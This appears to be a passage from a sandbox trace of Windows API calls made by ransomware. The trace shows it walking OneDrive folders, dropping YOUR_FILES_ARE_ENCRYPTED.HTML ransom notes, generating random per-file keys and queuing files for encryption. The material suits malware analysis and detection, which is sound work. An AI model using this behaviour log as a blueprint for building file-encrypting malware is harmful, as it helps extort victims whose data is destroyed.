hFindFile=0x42f3280) returned 1 [0162.511] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.512] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.514] CloseHandle (hObject=0x5ac) returned 1 [0162.514] GetProcessHeap () returned 0x270000 [0162.515] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.515] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab5bb9d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab6ec4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab6ec4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sw", cAlternateFileName="")) returned 1 [0162.515] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw") returned 74 [0162.515] GetProcessHeap () returned 0x270000 [0162.515] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.515] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw" [0162.515] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\*" [0162.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab5bb9d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab6ec4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab6ec4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.516] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab5bb9d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab6ec4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab6ec4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.516] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab6ec4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab6ec4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab6ec4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122b0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.516] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.516] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.516] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.516] lstrlenW (lpString=".mui") returned 4 [0162.516] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.516] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab6ec4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab6ec4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab6ec4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122b0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.516] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.516] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.517] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.519] CloseHandle (hObject=0x5ac) returned 1 [0162.520] GetProcessHeap () returned 0x270000 [0162.521] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.521] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4bce6d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4bce6d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4bce6d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2aaca0, dwReserved0=0x0, dwReserved1=0x60, cFileName="SyncEngine.dll", cAlternateFileName="SYNCEN~1.DLL")) returned 1 [0162.521] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll") returned 86 [0162.521] lstrcmpW (lpString1="SyncEngine.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.521] PathFindExtensionW (pszPath="SyncEngine.dll") returned=".dll" [0162.521] lstrlenW (lpString=".dll") returned 4 [0162.521] PathFindExtensionW (pszPath="SyncEngine.dll") returned=".dll" [0162.521] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\syncengine.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0162.522] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=2796704) returned 1 [0162.522] GetProcessHeap () returned 
0x270000 [0162.522] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0162.523] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A8") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="EA") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="40") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="AF") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="F3") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="B2") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="74") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="20") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="52") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="6B") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="FB") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="C4") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="D0") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="2B") returned 2 [0162.523] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="DC") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="47") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="DF") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="3F") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="22") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="13") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd162, 
param_2="%02X" | out: param_1="36") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="EE") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="9D") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="94") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="9E") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="62") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="49") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="96") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="30") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="E1") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="91") returned 2 [0162.524] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="43") returned 2 [0162.525] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll" [0162.525] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.525] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0162.726] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab6ec4d0, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xab7f6e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab7f6e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ta", cAlternateFileName="")) returned 1 [0162.728] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta") returned 74 [0162.728] GetProcessHeap () returned 0x270000 [0162.729] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.729] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta" [0162.729] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\*" [0162.729] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab6ec4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab7f6e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab7f6e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.831] FindNextFileW (in: hFindFile=0x42f3280, 
lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab6ec4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab7f6e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab7f6e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.831] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab7f6e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab7f6e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab7f6e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x142a8, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.831] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.831] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.831] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.831] lstrlenW (lpString=".mui") returned 4 [0162.832] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.832] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab7f6e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab7f6e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab7f6e70, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x142a8, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.832] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.832] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ta\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ta\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.833] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.835] CloseHandle (hObject=0x5ac) returned 1 [0162.836] GetProcessHeap () returned 0x270000 [0162.837] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.837] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab7f6e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab973c30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab973c30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="te", cAlternateFileName="")) returned 1 [0162.837] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" 
| out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te") returned 74 [0162.837] GetProcessHeap () returned 0x270000 [0162.837] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.838] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te" [0162.838] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\*" [0162.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab7f6e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab973c30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab973c30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.838] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab7f6e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab973c30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab973c30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.838] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab973c30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab973c30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab973c30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.838] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.838] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.839] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.839] lstrlenW (lpString=".mui") returned 4 [0162.839] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.839] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab973c30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab973c30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab973c30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x1bd0de5, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.839] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.839] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\te\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\te\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.840] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.842] CloseHandle (hObject=0x5ac) returned 1 [0162.843] GetProcessHeap () returned 0x270000 [0162.843] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.843] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4dbd8b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4dbd8b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4dbd8b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x754a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="Telemetry.dll", cAlternateFileName="TELEME~1.DLL")) returned 1 [0162.844] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\Telemetry.dll") returned 85 [0162.844] lstrcmpW (lpString1="Telemetry.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.844] PathFindExtensionW (pszPath="Telemetry.dll") returned=".dll" [0162.844] lstrlenW (lpString=".dll") returned 4 [0162.844] 
